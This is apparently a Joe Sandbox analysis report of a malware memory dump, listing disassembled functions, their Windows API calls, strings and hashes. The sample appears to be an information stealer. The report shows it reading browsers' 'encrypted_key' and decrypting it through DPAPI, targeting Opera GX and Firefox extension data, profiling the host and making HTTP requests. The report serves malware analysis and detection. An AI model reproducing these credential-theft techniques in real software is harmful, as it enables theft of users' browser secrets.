DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

^userContextId=4294967295, xrefs: 0040D4D7
moz-extension+++, xrefs: 0040D4DD

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 816962e9c3afc16b7876f5dffe6556581362ffbc47f3743437905f97f4b6a93d
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 0040821B
, xrefs: 00408241
"encrypted_key":", xrefs: 004081DF

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 737d85e22274ce53574d9f3d91b8069edbe1844aa71f10a5979b771c1d3bb9a1
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 00416896
ERROR, xrefs: 0041686B

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9

Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID:
API String ID: 4198075804-0
Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98

Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 0040C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Strings

Opera GX, xrefs: 0040C97F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99

Function 00407B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A

Strings

, xrefs: 00407B5D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
